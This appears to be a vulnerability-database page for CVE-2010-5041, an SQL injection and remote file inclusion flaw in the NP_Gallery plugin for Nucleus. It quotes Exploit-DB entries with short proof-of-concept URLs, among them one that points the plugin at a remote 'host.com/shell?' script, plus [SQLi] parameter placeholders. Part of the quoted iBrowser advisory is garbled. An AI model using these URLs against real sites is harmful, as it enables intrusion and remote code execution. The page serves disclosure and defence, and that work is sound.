CVE-2010-5041
published 2011-11-02CVE-2010-5041: SQL injection vulnerability in index.php in the NP_Gallery plugin 0.94 for Nucleus allows remote attackers to execute arbitrary SQL commands via the id…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.18%
63.8th percentile
SQL injection vulnerability in index.php in the NP_Gallery plugin 0.94 for Nucleus allows remote attackers to execute arbitrary SQL commands via the id parameter in a plugin action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| john_bradshaw | np_gallery_plugin | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
iBrowser Plugin 1.4.1 - 'lang' Local File Inclusion
exploitdb·2011-09-17
CVE-2010-5281 iBrowser Plugin 1.4.1 - 'lang' Local File Inclusion
iBrowser Plugin 1.4.1 - 'lang' Local File Inclusion
---
iBrowser Plugin v1.4.1 (lang) Local File Inclusion Vulnerability
Vendor: net4visions.com
Product web page: http://www.net4visions.com
Affected version: lang.'.php' );
70: $this -> charset = $lang_charset;
71: $this -> dir = $lang_direction;
72: $this -> lang_data = $lang_data;
73: unset( $lang_data );
74: include( dirname(__FILE__) . '/' . $cfg['lang'].'.php' );
75: $this -> default_lang_data = $lang_data;
76: }
Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Advisory ID: ZSL-2011-5041
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5041.php
15.09.2011
--
http://[SOME_CMS]/jsc
Exploit-DB
Nucleus Plugin Gallery - Remote File Inclusion / SQL Injection
exploitdb·2010-05-29
CVE-2010-5041 Nucleus Plugin Gallery - Remote File Inclusion / SQL Injection
Nucleus Plugin Gallery - Remote File Inclusion / SQL Injection
---
[o] Nucleus Plugin Gallery RFI & SQLi Vulnerability
Software : NP_Gallery version 0.94
Download : http://wakka.xiffy.nl/_media/np_gallery_0941.zip?id=gallery&cache=cache
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
[o] Exploit
http://localhost/[path]/nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=[evilc0de]
http://localhost/[path]/index.php?action=plugin&name=gallery&type=album&id=[SQLi]
http://localhost/[path]/index.php?action=plugin&name=gallery&type=item&id=[SQLi]
[o] PoC
http://localhost/nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://host.com/shell?
http://localhost/index.php?action=plugin&name=gallery&type=album&id
No writeups or analysis indexed.
http://secunia.com/advisories/40022http://www.exploit-db.com/exploits/12787/http://www.osvdb.org/65005http://www.securityfocus.com/bid/40448http://www.vupen.com/english/advisories/2010/1285https://exchange.xforce.ibmcloud.com/vulnerabilities/58997http://secunia.com/advisories/40022http://www.exploit-db.com/exploits/12787/http://www.osvdb.org/65005http://www.securityfocus.com/bid/40448http://www.vupen.com/english/advisories/2010/1285https://exchange.xforce.ibmcloud.com/vulnerabilities/58997
2011-11-02
Published